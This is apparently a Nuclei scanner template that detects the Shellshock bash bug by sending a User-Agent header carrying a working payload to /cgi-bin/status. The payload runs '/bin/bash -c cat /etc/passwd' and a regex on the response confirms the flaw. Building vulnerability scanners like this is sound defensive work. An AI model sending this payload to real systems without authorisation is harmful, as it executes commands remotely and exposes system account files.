id: rce-user-agent-shell-shock

info:
 name: Remote Code Execution Via (User-Agent)
 author: 0xelkomy
 severity: high
 description: todo

requests:
 - method: GET
   headers:
    User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
   path:
    - "{{BaseURL}}/cgi-bin/status"
   matchers:
    - type: regex
      regex:
       - "root:[x*]:0:0"
      part: body